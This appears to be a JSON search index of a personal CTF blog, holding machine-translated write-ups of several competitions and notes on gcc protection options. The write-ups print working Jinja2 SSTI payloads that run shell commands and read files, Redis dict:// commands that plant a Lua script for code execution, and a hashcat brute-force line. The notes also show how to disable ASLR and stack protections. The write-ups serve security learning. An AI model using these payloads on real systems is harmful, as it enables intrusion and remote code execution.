[{"content":"","externalUrl":"https://bili33.top/","permalink":"/en/links/links_ad/gamernotitle/","section":"LINKS","summary":"TECH OTAKUS SAVE THE WORLD","title":"GamerNoTitle","type":"Link_AD"},{"content":"","externalUrl":"https://www.j3r3m14h.com.cn/Je2em1ah_blog/","permalink":"/en/links/links_ad/jeremiah/","section":"LINKS","summary":"不会Reverse的🐭🐭","title":"Jeremiah 🐹","type":"Link_AD"},{"content":"","externalUrl":"https://blog.rkk.moe/","permalink":"/en/links/links_ad/phrinky/","section":"LINKS","summary":"Phrinky\u0026rsquo;s Blog","title":"Phrinky","type":"Link_AD"},{"content":"","externalUrl":"http://ak1yamam10.cn/","permalink":"/en/links/links_ad/ak1m1o/","section":"LINKS","summary":"","title":"Ak1M1O","type":"Link_AD"},{"content":"","externalUrl":"https://4ra1n.blogspot.com/","permalink":"/en/links/links_ad/fallrain/","section":"LINKS","summary":"","title":"Fallrain","type":"Link_AD"},{"content":"","externalUrl":"https://lrhtony.cn/","permalink":"/en/links/links_ad/lrhtony/","section":"LINKS","summary":"","title":"lrhtony","type":"Link_AD"},{"content":"","externalUrl":"https://sias2701.github.io/","permalink":"/en/links/links_ad/sias27/","section":"LINKS","summary":"","title":"Sias27","type":"Link_AD"},{"content":"","externalUrl":"https://zx2023qj.github.io/","permalink":"/en/links/links_ad/zxzx/","section":"LINKS","summary":"","title":"zxzx","type":"Link_AD"},{"content":"","externalUrl":"https://blog.rusty1e.top/","permalink":"/en/links/links_ad/rusty/","section":"LINKS","summary":"这是一个简陋的博客","title":"rusty","type":"Link_AD"},{"content":"","externalUrl":"https://lsjgp.github.io/","permalink":"/en/links/links_ad/lsjpg/","section":"LINKS","summary":"LSJGP的垃圾堆","title":"LSJPG","type":"Link_AD"},{"content":"","externalUrl":"https://keqing.moe/","permalink":"/en/links/links_ad/keqing/","section":"LINKS","summary":"心有所向，日复一日，必有精进","title":"Keqing","type":"Link_Friends"},{"content":"","date":"19 January 2025","externalUrl":null,"permalink":"/en/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":" WARNING！ This is a machine translated version of the Chinese page misc # Simple arithmetic # Think about XOR\nys~xdg/m@]mjkz@vl@z~lf\u0026gt;b Run the script directly\ndata = \u0026#34;ys~xdg/m@]mjkz@vl@z~lf\u0026gt;b\u0026#34; for shift in range(127): result = \u0026#34;\u0026#34; for i in range(len(data)): # print() result += chr(ord(data[i]) ^ shift) if result.startswith(\u0026#34;flag\u0026#34;): print(result) exit(0) # print(result) # flag{x0r_Brute_is_easy!} Crypto # Are you Little Haas? # A young hacker named Xiao Fu participated in a CTF competition. He found that the content of the Little Haas file was highly regular and there was hidden information in the file name. He successfully found the hidden information and cracked the challenge. He said proudly: \u0026ldquo;Success lies in exploration and questioning. Collision is the key to discovering the truth!\u0026rdquo;\n356a192b7913b04c54574d18c28d46e6395428ab da4b9237bacccdf19c0760cab7aec4a8359010b0 77de68daecd823babbb58edb1c8e14d7106e83bb 1b6453892473a467d07372d45eb05abc2031647a ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4 c1dfd96eea8cc2b62785275bca38ac261256e278 902ba3cda1883801594b6e1b452790cc53948fda fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f 0ade7c2cf97f75d009975f4d720d1fa6c19f4897 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c 3bc15c8aae3e4124dd409035f32ea2fd6835efc9 21606782c65e44cac7afbb90977d8b6f82140e76 22ea1c649c82946aa6e479e1ffd321e4a318b1b0 aff024fe4ab0fece4091de044c58c9ae4233383a 58e6b3a414a1e090dfc6029add0f3555ccba127f 4dc7c9ec434ed06502767136789763ec11d2c4b7 8efd86fb78a56a5145ed7739dcb00c78581c5375 95cb0bfd2977c761298d9624e4b4d4c72a39974a 51e69892ab49df85c6230ccc57f8e1d1606caccc 042dc4512fa3d391c5170cf3aa61e6a638f84342 7a81af3e591ac713f81ea1efe93dcf36157d8376 516b9783fca517eecbd1d064da2d165310b19759 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b 60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 d1854cae891ec7b29161ccaf79a24b00c274bdaa 7a81af3e591ac713f81ea1efe93dcf36157d8376 53a0acfad59379b3e050338bf9f23cfc172ee787 042dc4512fa3d391c5170cf3aa61e6a638f84342 a0f1490a20d0211c997b44bc357e1972deab8ae3 53a0acfad59379b3e050338bf9f23cfc172ee787 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b c2b7df6201fdd3362399091f0a29550df3505b6a 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 a0f1490a20d0211c997b44bc357e1972deab8ae3 3c363836cf4e16666669a25da280a1865c2d2874 4a0a19218e082a343a1b17e5333409af9d98f0f5 54fd1711209fb1c0781092374132c66e79e2241b 27d5482eebd075de44389774fce28c69f45c8a75 5c2dd944dde9e08881bef0894fe7b22a5c9c4b06 13fbd79c3d390e5d6585a21e11ff5ec1970cff0c 07c342be6e560e7f43842e2e21b774e61d85f047 395df8f7c51f007019cb30201c49e884b46b92fa 11f6ad8ec52a2984abaafd7c3b516503785c2072 84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 7a38d8cbd20d9932ba948efaa364bb62651d5ad4 e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 d1854cae891ec7b29161ccaf79a24b00c274bdaa 6b0d31c0d563223024da45691584643ac78c96e8 5c10b5b2cd673a0616d529aa5234b12ee7153808 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b 60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 54fd1711209fb1c0781092374132c66e79e2241b 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 6b0d31c0d563223024da45691584643ac78c96e8 58e6b3a414a1e090dfc6029add0f3555ccba127f 53a0acfad59379b3e050338bf9f23cfc172ee787 84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 22ea1c649c82946aa6e479e1ffd321e4a318b1b0 e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 53a0acfad59379b3e050338bf9f23cfc172ee787 042dc4512fa3d391c5170cf3aa61e6a638f84342 a0f1490a20d0211c997b44bc357e1972deab8ae3 042dc4512fa3d391c5170cf3aa61e6a638f84342 a0f1490a20d0211c997b44bc357e1972deab8ae3 53a0acfad59379b3e050338bf9f23cfc172ee787 84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 11f6ad8ec52a2984abaafd7c3b516503785c2072 95cb0bfd2977c761298d9624e4b4d4c72a39974a 395df8f7c51f007019cb30201c49e884b46b92fa c2b7df6201fdd3362399091f0a29550df3505b6a 3a52ce780950d4d969792a2559cd519d7ee8c727 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 a0f1490a20d0211c997b44bc357e1972deab8ae3 3c363836cf4e16666669a25da280a1865c2d2874 4a0a19218e082a343a1b17e5333409af9d98f0f5 54fd1711209fb1c0781092374132c66e79e2241b 27d5482eebd075de44389774fce28c69f45c8a75 5c2dd944dde9e08881bef0894fe7b22a5c9c4b06 13fbd79c3d390e5d6585a21e11ff5ec1970cff0c 07c342be6e560e7f43842e2e21b774e61d85f047 395df8f7c51f007019cb30201c49e884b46b92fa 11f6ad8ec52a2984abaafd7c3b516503785c2072 84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 7a38d8cbd20d9932ba948efaa364bb62651d5ad4 e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 d1854cae891ec7b29161ccaf79a24b00c274bdaa 6b0d31c0d563223024da45691584643ac78c96e8 5c10b5b2cd673a0616d529aa5234b12ee7153808 3a52ce780950d4d969792a2559cd519d7ee8c727 22ea1c649c82946aa6e479e1ffd321e4a318b1b0 aff024fe4ab0fece4091de044c58c9ae4233383a 58e6b3a414a1e090dfc6029add0f3555ccba127f 4dc7c9ec434ed06502767136789763ec11d2c4b7 8efd86fb78a56a5145ed7739dcb00c78581c5375 95cb0bfd2977c761298d9624e4b4d4c72a39974a 51e69892ab49df85c6230ccc57f8e1d1606caccc 042dc4512fa3d391c5170cf3aa61e6a638f84342 7a81af3e591ac713f81ea1efe93dcf36157d8376 516b9783fca517eecbd1d064da2d165310b19759 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b 60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 d1854cae891ec7b29161ccaf79a24b00c274bdaa 7a81af3e591ac713f81ea1efe93dcf36157d8376 53a0acfad59379b3e050338bf9f23cfc172ee787 042dc4512fa3d391c5170cf3aa61e6a638f84342 a0f1490a20d0211c997b44bc357e1972deab8ae3 53a0acfad59379b3e050338bf9f23cfc172ee787 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b c2b7df6201fdd3362399091f0a29550df3505b6a 356a192b7913b04c54574d18c28d46e6395428ab da4b9237bacccdf19c0760cab7aec4a8359010b0 77de68daecd823babbb58edb1c8e14d7106e83bb 1b6453892473a467d07372d45eb05abc2031647a ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4 c1dfd96eea8cc2b62785275bca38ac261256e278 902ba3cda1883801594b6e1b452790cc53948fda fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f 0ade7c2cf97f75d009975f4d720d1fa6c19f4897 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c 3bc15c8aae3e4124dd409035f32ea2fd6835efc9 21606782c65e44cac7afbb90977d8b6f82140e76 Use hash-identifier to determine if it is sha1\nUse the script to run once to get the result\nimport hashlib f = open(\u0026#34;data.txt\u0026#34;, \u0026#34;r\u0026#34;) data = f.readlines() flag = \u0026#34;\u0026#34; for c in data: for i in range(128): hash = hashlib.sha1(str(chr(i)).encode()).hexdigest() if c.strip() == hash: flag += chr(i) # print(i, hash, c) print(flag) 1234567890-=qwertyuiopflag{no_is_flag}asdfghjklzxcvbnm,flag{game_cqb_isis_cxyz}.asdfghjklzxcvbnm,.qwertyuiopflag{no_is_flag}1234567890-=\nThe journey to hash # In Digital City, everyone communicates through digital phones, usually with 11-digit pure-blood numbers starting with 188. Alexander intercepted a special string \u0026ldquo;ca12fd8250972ec363a16593356abb1f3cf3a16d\u0026rdquo; in a special place. After checking, he found that this string was a bit similar to the scattered countries before, and it might be to the hash country. The young programmer Alexander was curious about this country and decided to decipher the hash value. After a period of exploration, Alexander succeeded in cracking it with his strong programming skills. After entering the corresponding string, he was instantly transferred to a fantasy data world. At the same time, Alexander also began his journey of further study. (Submission format: flag{11-digit number})\nPut ca12fd8250972ec363a16593356abb1f3cf3a16d in hash.txt and use hashcat to blast\nhashcat -m 100 -a 3 hash 188?d?d?d?d?d?d?d?d --show ca12fd8250972ec363a16593356abb1f3cf3a16d:18876011645\nflag{18876011645}\nWEB # easy_flask # Use {{7*7}} to test and find SSTI\nThis question does not have any filtering, just use it directly\n{{().__class__.__base__.__subclasses__()[216].__init__.__globals__.__builtins__[\u0026#39;eval\u0026#39;](\u0026#39;__import__(\u0026#34;os\u0026#34;).popen(\u0026#34;cat flag\u0026#34;).read()\u0026#39;)}} Reverse # ezre # Some key logic:\nunsigned __int64 main_program() { unsigned int seed[2]; // [rsp+20h] [rbp-80h] BYREF __int64 v2; // [rsp+28h] [rbp-78h] char s[48]; // [rsp+30h] [rbp-70h] BYREF _BYTE s1[56]; // [rsp+60h] [rbp-40h] BYREF unsigned __int64 v5; // [rsp+98h] [rbp-8h] v5 = __readfsqword(0x28u); *(_QWORD *)seed = 0LL; v2 = 0LL; custom_md5_init(seed); srand(seed[0]); printf(\u0026#34;Enter input: \u0026#34;); fgets(s, 43, stdin); if ( strlen(s) == 42 ) { memset(s1, 0, 0x2BuLL); xor_string_with_rand(s, s1); if ( !memcmp(s1, \u0026amp;ida_chars, 0x2BuLL) ) puts(\u0026#34;right\u0026#34;); else puts(\u0026#34;wrong\u0026#34;); } else { puts(\u0026#34;Invalid input length.\u0026#34;); } return v5 - __readfsqword(0x28u); } void __fastcall xor_string_with_rand(__int64 a1, __int64 a2) { int i; // [rsp+18h] [rbp-8h] for ( i = 0; i \u0026lt;= 41; ++i ) *(_BYTE *)(i + a2) = (rand() % 127) ^ *(_BYTE *)(i + a1); } Analysis:\nThe random seed is set in advance, so the random number generated each time is fixed I am too lazy to analyze the process of initializing the seed, but you can use dynamic debugging to obtain the initialized seed The XOR is used for encryption, so the original text can be obtained by XORing again The handwritten decryption script is garbled, I don’t understand it, so I directly use the original program to decrypt\nSpecific ideas:\nUse IDA to extract the ciphertext, use the script to pass the ciphertext (including unprintable characters) into the program, and dynamically debug to obtain the ciphertext of the program XORing (decryption) again\nfrom pwn import * li = lambda x : print(\u0026#39;\\x1b[01;38;5;214m\u0026#39; + str(x) + \u0026#39;\\x1b[0m\u0026#39;) ll = lambda x : print(\u0026#39;\\x1b[01;38;5;1m\u0026#39;+ str(x) + \u0026#39;\\x1b[0m\u0026#39;) # Config LOCAL = True file = \u0026#39;./ezre\u0026#39; remote_addr = \u0026#39;localhost\u0026#39; remote_port = 65535 context.log_level=\u0026#39;DEBUG\u0026#39; # [\u0026#39;CRITICAL\u0026#39;, \u0026#39;DEBUG\u0026#39;, \u0026#39;ERROR\u0026#39;, \u0026#39;INFO\u0026#39;, \u0026#39;NOTSET\u0026#39;, \u0026#39;WARNING\u0026#39;] elf = ELF(file) context.binary = elf rop = ROP(elf) def dbg(p : process): if LOCAL: gdb.attach(p, \u0026#39;x-pwn\u0026#39;) def get_Process(): if LOCAL: p = process(file) else: p = remote(remote_addr,remote_port) return p def exp(): p = get_Process() # Real Start of EXP dbg(p) data = b\u0026#34;\\x5C\\x76\\x4A\\x78\\x15\\x62\\x05\\x7C\\x6B\\x21\\x40\\x66\\x5B\\x1A\\x48\\x7A\\x1E\\x46\\x7F\\x28\\ x02\\x75\\x68\\x2A\\x34\\x0C\\x4B\\x1D\\x3D\\x2E\\x6B\\x7A\\x17\\x45\\x07\\x75\\x47\\x27\\x39\\x78\\x61\u0026#34; p.sendline(data) p.interactive() flag = p.recvline_startswith(b\u0026#39;flag\u0026#39;).decode() li(\u0026#34;[+] Got Flag!\u0026#34;) print(flag) p.close() if __name__ == \u0026#39;__main__\u0026#39;: exp() # Principle: XOR twice to get the original text # gdb debugging operation: # b *main_program+153 # c # n 20 # gdb result: # ► 0x55a8ff6f34f9 \u0026lt;main_program+244\u0026gt; mov rsi, rcx RSI =\u0026gt; 0x55a8ff6f6020 (ida_chars) ◂— 0x7c056215784a765c # 0x55a8ff6f34fc \u0026lt;main_program+247\u0026gt; mov rdi, rax RDI =\u0026gt; 0x7fff23392bc0 ◂— \u0026#39;flag{b799eb3a-59ee-4b3b-b49d-39080fc23e99|\u0026#39; # 0x55a8ff6f34ff \u0026lt;main_program+250\u0026gt; call memcmp@plt \u0026lt;memcmp@plt\u0026gt; Verify again that the flag is correct:\nflag{b799eb3a-59ee-4b3b-b49d-39080fc23e99}\n","date":"19 January 2025","externalUrl":null,"permalink":"/en/posts/cqgame2024_winter/","section":"Posts","summary":"CQGAME2024 Winter Personal WriteUP","title":"CQGAME2024 Winter","type":"posts"},{"content":"","date":"19 January 2025","externalUrl":null,"permalink":"/en/tags/ctf/","section":"Tags","summary":"","title":"ctf","type":"tags"},{"content":" Recent CQGAME2024 Winter 19 January 2025\u0026middot;873 words\u0026middot;5 mins writeup writeup ctf CQGAME2024 Winter Personal WriteUP The 8th GCSIS 18 January 2025\u0026middot;209 words\u0026middot;1 min writeup writeup ctf The 8th GCSIS Personal WriteUP Gcc Compiler Protection Options 15 January 2025\u0026middot;998 words\u0026middot;5 mins notes notes ctf Gcc Compiler Protection Options CCSSSC2025 5 January 2025\u0026middot;285 words\u0026middot;2 mins writeup writeup ctf CCSSC 2025 Personal WriteUP ADCTF2024 2 December 2024\u0026middot;2785 words\u0026middot;14 mins writeup writeup ctf Personal WriteUP of AD Studio 2024 Recruitment Competition More Posts ","date":"19 January 2025","externalUrl":null,"permalink":"/en/","section":"HOME","summary":" Recent CQGAME2024 Winter 19 January 2025\u0026middot;873 words\u0026middot;5 mins writeup writeup ctf CQGAME2024 Winter Personal WriteUP The 8th GCSIS 18 January 2025\u0026middot;209 words\u0026middot;1 min writeup writeup ctf The 8th GCSIS Personal WriteUP Gcc Compiler Protection Options 15 January 2025\u0026middot;998 words\u0026middot;5 mins notes notes ctf Gcc Compiler Protection Options CCSSSC2025 5 January 2025\u0026middot;285 words\u0026middot;2 mins writeup writeup ctf CCSSC 2025 Personal WriteUP ADCTF2024 2 December 2024\u0026middot;2785 words\u0026middot;14 mins writeup writeup ctf Personal WriteUP of AD Studio 2024 Recruitment Competition More Posts ","title":"HOME","type":"page"},{"content":"","date":"19 January 2025","externalUrl":null,"permalink":"/en/posts/","section":"Posts","summary":"","title":"Posts","type":"posts"},{"content":"","date":"19 January 2025","externalUrl":null,"permalink":"/en/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"19 January 2025","externalUrl":null,"permalink":"/en/categories/writeup/","section":"Categories","summary":"","title":"writeup","type":"categories"},{"content":"","date":"19 January 2025","externalUrl":null,"permalink":"/en/tags/writeup/","section":"Tags","summary":"","title":"writeup","type":"tags"},{"content":" WARNING！ This is a machine translated version of the Chinese page WEB # Rank-I # Try rce\n{{().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__[\u0026#39;eval\u0026#39;](\u0026#39;__import__(\u0026#34;os\u0026#34;).popen(\u0026#34;ls ..\u0026#34;).read()\u0026#39;)}} app bin boot dev etc flagf149 home lib lib64 media mnt opt proc root run sbin srv start.sh sys tmp usr var It is known that there is a flagf419 file in the root directory, which should be flag. It cannot be read directly.\n{{().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__[\u0026#39;eval\u0026#39;](\u0026#39;open(\u0026#34;app.py\u0026#34;).read()\u0026#39;)}} Get the source code:\nfrom flask import Flask, request, render_template, render_template_string, redirect, url_for, abort from urllib.parse import unquote app = Flask(__name__) phone = \u0026#39;\u0026#39; def is_safe_input(user_input): # unsafe_keywords = [\u0026#39;eval\u0026#39;, \u0026#39;exec\u0026#39;, \u0026#39;os\u0026#39;, \u0026#39;system\u0026#39;, \u0026#39;import\u0026#39;, \u0026#39;__import__\u0026#39;] unsafe_keywords = [\u0026#39;flag\u0026#39;,\u0026#39;?\u0026#39;,\u0026#39;*\u0026#39;,\u0026#39;-\u0026#39;,\u0026#39;less\u0026#39;,\u0026#39;nl\u0026#39;,\u0026#39;tac\u0026#39;,\u0026#39;more\u0026#39;,\u0026#39;tail\u0026#39;,\u0026#39;od\u0026#39;,\u0026#39;grep\u0026#39;,\u0026#39;awd\u0026#39;,\u0026#39;sed\u0026#39;,\u0026#39;64\u0026#39;,\u0026#39;/\u0026#39;,\u0026#39;%2f\u0026#39;,\u0026#39;%2F\u0026#39;] if any(keyword in user_input for keyword in unsafe_keywords): # if user_input in unsafe_keywords: return True return False @app.route(\u0026#34;/\u0026#34;) def index(): return render_template(\u0026#34;index.html\u0026#34;) @app.route(\u0026#34;/login\u0026#34;, methods=[\u0026#34;POST\u0026#34;]) def login(): global phone phone = request.form.get(\u0026#34;phone_number\u0026#34;) return render_template(\u0026#34;login.html\u0026#34;) @app.route(\u0026#34;/cpass\u0026#34;, methods=[\u0026#34;POST\u0026#34;]) def check(): global phone password = request.form.get(\u0026#34;password\u0026#34;) if is_safe_input(phone): return redirect(url_for(\u0026#39;index\u0026#39;)) if phone != \u0026#34;1686682318\u0026#34; and password != \u0026#34;Happy_news_admin\u0026#34;: return render_template_string(\u0026#39;\u0026lt;!DOCTYPE html\u0026gt;\\ \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt;\\ \u0026lt;head\u0026gt;\\ \u0026lt;meta charset=\u0026#34;UTF-8\u0026#34;\u0026gt;\\ \u0026lt;title\u0026gt;login failed\u0026lt;/title\u0026gt;\\ \u0026lt;/head\u0026gt;\\ \u0026lt;body\u0026gt;\\ \u0026lt;script\u0026gt;alert(\u0026#34;{}The number does not exist or the password is incorrect!\u0026#34;) \u0026lt;/script\u0026gt;\\ \u0026lt;script\u0026gt;window.location.href = \u0026#34;/\u0026#34;;\u0026lt;/script\u0026gt;\\ \u0026lt;/body\u0026gt;\\ \u0026lt;/html\u0026gt;\u0026#39;.format(phone)) else: return redirect(url_for(\u0026#39;index\u0026#39;)) if __name__ == \u0026#39;__main__\u0026#39;: app.run(host=\u0026#34;0.0.0.0\u0026#34;, port=int(\u0026#34;5005\u0026#34;), debug=True) Check the source code and find that it is filtered['flag','?','*','-','less','nl','tac','more','tail','od','grep','awd','sed','64','/','%2f','%2F']\n{{().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__[\u0026#39;eval\u0026#39;](\u0026#39;open(chr(47)+\u0026#34;fla\u0026#34;+\u0026#34;gf149\u0026#34;).read()\u0026#39;)}} Get the flag\nDASCTF{49467766377144059055627981055717}\n","date":"18 January 2025","externalUrl":null,"permalink":"/en/posts/gcsis_8/","section":"Posts","summary":"The 8th GCSIS Personal WriteUP","title":"The 8th GCSIS","type":"posts"},{"content":" This article is excerpted from linux program protection mechanism \u0026amp; gcc compile options\nOriginal author: HAPPYers\nWARNING！ This is a machine translated version of the Chinese page Summary # NX: -z execstack / -z noexecstack (off / on) Canary: -fno-stack-protector / -fstack-protector / -fstack-protector-all (off / on / all on) PIE: -no-pie / -pie (off / on) RELRO: -z norelro / -z lazy / -z now (off / partially on / fully on) Canary # In version 4.2, gcc added the -fstack-protector and -fstack-protector-all compilation parameters to support stack protection. In version 4.9, the -fstack-protector-strong compilation parameter was added to make the protection wider. Compilation control options\ngcc -o test test.c // By default, Canary protection is not enabled gcc -fno-stack-protector -o test test.c // Disable stack protection gcc -fstack-protector -o test test.c // Enable stack protection, but only insert protection code for functions with char arrays in local variables gcc -fstack-protector-all -o test test.c // Enable stack protection and insert protection code for all functions Fortify # Fortify is actually a very light check, used to check whether there is a buffer overflow error. This is useful for programs that use a lot of string or memory manipulation functions, such as memcpy, memset, stpcpy, strcpy, strncpy, strcat, strncat, sprintf, snprintf, vsprintf, vsnprintf, gets, and wide character variants.\n_FORTIFY_SOURCE is set to 1, and the compiler is set to optimization 1 (gcc -O1), and the above situation occurs, then the program will be checked when compiled but the program functionality will not be changed _FORTIFY_SOURCE is set to 2, some checks will be added, but this may cause the program to crash. gcc -D_FORTIFY_SOURCE=1 will only check when compiling (especially for some header files #include \u0026lt;string.h\u0026gt;) gcc -D_FORTIFY_SOURCE=2 will also check when the program is executed (if buffer overflow is detected, the program will be terminated)\ngcc -o test test.c // By default, this check is not turned on gcc -D_FORTIFY_SOURCE=1 -o test test.c // Weaker check gcc -D_FORTIFY_SOURCE=2 -o test test.c // Stronger check NX(DEP) # NX stands for No-eXecute. The basic principle of NX (DEP) is to mark the memory page where the data is located as non-executable. When the program overflows successfully and transfers to the shellcode, the program will try to execute instructions on the data page. At this time, the CPU will throw an exception instead of executing malicious instructions. The gcc compiler has the NX option enabled by default. If you need to disable the NX option, you can add the -z execstack parameter to the gcc compiler\ngcc -o test test.c // Enable NX protection by default gcc -z execstack -o test test.c // Disable NX protection gcc -z noexecstack -o test test.c // Enable NX protection PIE(ASLR) # The address space layout randomization mechanism has the following three conditions\n0 - means turning off process address space randomization. 1 - means randomizing the base address of mmap, stack and vdso pages. 2 - means adding stack (heap) randomization on the basis of 1. How to turn off PIE in Linux is as follows sudo -s echo 0 \u0026gt; /proc/sys/kernel/randomize_va_space gcc compilation options gcc -o test test.c // By default, PIE is not enabled gcc -fpie -pie -o test test.c // Enable PIE, strength is 1 at this time gcc -fPIE -pie -o test test.c // Enable PIE, maximum strength is 2 at this time gcc -fpic -o test test.c // Enable PIC, strength is 1 at this time, PIE will not be enabled gcc -fPIC -o test test.c // Enable PIC, maximum strength is 2 at this time, PIE will not be enabled Description # PIE was first implemented by RedHat people, who added the -pie option to the linker, so that objects compiled with -fPIE can get position-independent executable programs through the linker. fPIE and fPIC are somewhat different. Please refer to -fPIC option in Gcc and Open64.\nThe -fpic option in gcc is used when compiling shared libraries when the target machine supports it. The compiled code will access memory through the constant address in the Global Offset Table, and the dynamic loader will parse the GOT table entry when the program starts executing (note that the dynamic loader is part of the operating system, and the linker is part of GCC). The -fPIC option in gcc is specially processed for some special models, such as being suitable for dynamic linking and avoiding errors such as exceeding the GOT size limit. Open64 only supports PIC compilation that does not cause GOT table overflow.\nThe -fpie and -fPIE options in gcc are very similar to fpic and fPIC, but the difference is that in addition to generating position-independent code, they can also assume that the code belongs to the program. Usually these options are used together with the -pie option when GCC is linked. The fPIE option can only be used when compiling executable code, not for compiling libraries. Therefore, if you want a PIE program, you need to add the -pie option to ld in addition to the -fPIE option in gcc to generate this code. That is, use gcc -fpie -pie to compile the program. Using either one alone will not achieve the desired effect.\nRELRO # GCC, GNU linker, and Glibc-dynamic linker work together to implement a technology called relro: read only relocation. The general implementation is that the linker specifies a binary area that has been processed by the dynamic linker after relocation as read-only. Set the symbol redirection table to read-only or parse and bind all dynamic symbols at program startup to reduce attacks on the GOT (Global Offset Table). RELRO is \u0026ldquo;Partial RELRO\u0026rdquo;, which means that we have write permission to the GOT table.\ngcc compile options\ngcc -o test test.c // By default, it is Partial RELRO gcc -z norelro -o test test.c // Disable, i.e. No RELRO gcc -z lazy -o test test.c // Enable partially, i.e. Partial RELRO gcc -z now -o test test.c // Enable all, i.e. Full RELRO ","date":"15 January 2025","externalUrl":null,"permalink":"/en/posts/gcc_compile_options/","section":"Posts","summary":"Gcc Compiler Protection Options","title":"Gcc Compiler Protection Options","type":"posts"},{"content":"","date":"15 January 2025","externalUrl":null,"permalink":"/en/categories/notes/","section":"Categories","summary":"","title":"notes","type":"categories"},{"content":"","date":"15 January 2025","externalUrl":null,"permalink":"/en/tags/notes/","section":"Tags","summary":"","title":"notes","type":"tags"},{"content":" WARNING！ This is a machine translated version of the Chinese page WEB # CachedVisitor # Attachment\nSome useful tests:\nContainer is connected to the network and can read files. The dict protocol is available and redis can be accessed\nAnalyzed the source code\nmain.lua Read the contents between ##LUA_START## and ##LUA_END## from visit.script and run it as a script\nCOPY flag /flag COPY readflag /readflag RUN chmod 400 /flag RUN chmod +xs /readflag The flag has permissions set and cannot be read directly.\nTry to use redis to write visit.script to perform RCE\nWrite lua and test in local docker to output flag\n##LUA_START##ngx.say(io.popen(\u0026#39;/readflag\u0026#39;):read(\u0026#39;*all\u0026#39;))##LUA_END## Use redis to write lua to visit.script directly\ndict://127.0.0.1:6379/set:payload:\u0026#34;##LUA_START##ngx.say(io.popen(\u0026#39;/readflag\u0026#39;):read(\u0026#39;*all\u0026#39;))##LUA_END##\u0026#34; dict://127.0.0.1:6379/config:set:dir:/scripts/ dict://127.0.0.1:6379/config:set:dbfilename:visit.script dict://127.0.0.1:6379/bgsave After writing, you can execute what we wrote by sending a request at will Script\ndart{dc2e4048-dca7-4fa3-9803-8ee9d785af2b}\nMisc # Fishing E-mail # Bob received a phishing email. Please find the return address and port of the Trojan.If the backlink address and port are 123.213.123.123:1234, then the sensitive information is MD5 (123.213.123.123:1234), that is, d9bdd0390849615555d1f75fa854b14f, which is based on the result of Cyberchef.\nAttachment\nContent-Transfer-Encoding: base64 Found that the encoding format is Base64, we directly decode to view the content\nToday is your 24th birthday, wish you Happy birthday to you \u0026lt;div class=\u0026#34;qmbox\u0026#34;\u0026gt;\u0026lt;p style=\u0026#34;font-family: -apple-system, BlinkMacSystemFont, \u0026amp;quot;PingFang SC\u0026amp;quot;, \u0026amp;quot;Microsoft YaHei\u0026amp;quot;, sans-serif; font-size: 10.5pt; color: rgb(46, 48, 51);\u0026#34;\u0026gt;Today is your 24th birthday, wish you Happy birthday to you\u0026lt;/p\u0026gt;\u0026lt;div xmail-signature=\u0026#34;\u0026#34;\u0026gt;\u0026lt;xm-signature\u0026gt;\u0026lt;/xm-signature\u0026gt;\u0026lt;p\u0026gt;\u0026lt;/p\u0026gt;\u0026lt;/div\u0026gt;\u0026lt;/div\u0026gt; Birthday gift.zip(BIN) I used CyberChef to extract the zip file and found that there was a password\nDate: Mon, 11 Nov 2024 12:54:24 +0800 Based on birthday, guess the password 20001111\nSuccessfully decompressed to get exe\nAfter running in the virtual machine, capture the packet to get the reverse connection address!\nMD5(222.218.218.218:55555)\ndf3101212c55ea8c417ad799cfc6b509\n","date":"5 January 2025","externalUrl":null,"permalink":"/en/posts/ccsssc2025/","section":"Posts","summary":"CCSSC 2025 Personal WriteUP","title":"CCSSSC2025","type":"posts"},{"content":"","date":"1 January 2025","externalUrl":null,"permalink":"/en/tags/link/","section":"Tags","summary":"","title":"link","type":"tags"},{"content":"Links to some of my friends\u0026rsquo; Blog or Home Page\nTo add your site to this list, Contact Me. ","date":"1 January 2025","externalUrl":null,"permalink":"/en/links/","section":"LINKS","summary":"Links to some of my friends\u0026rsquo; Blog or Home Page","title":"LINKS","type":"links"},{"content":"","date":"1 January 2025","externalUrl":null,"permalink":"/en/categories/page/","section":"Categories","summary":"","title":"page","type":"categories"},{"content":"","date":"17 December 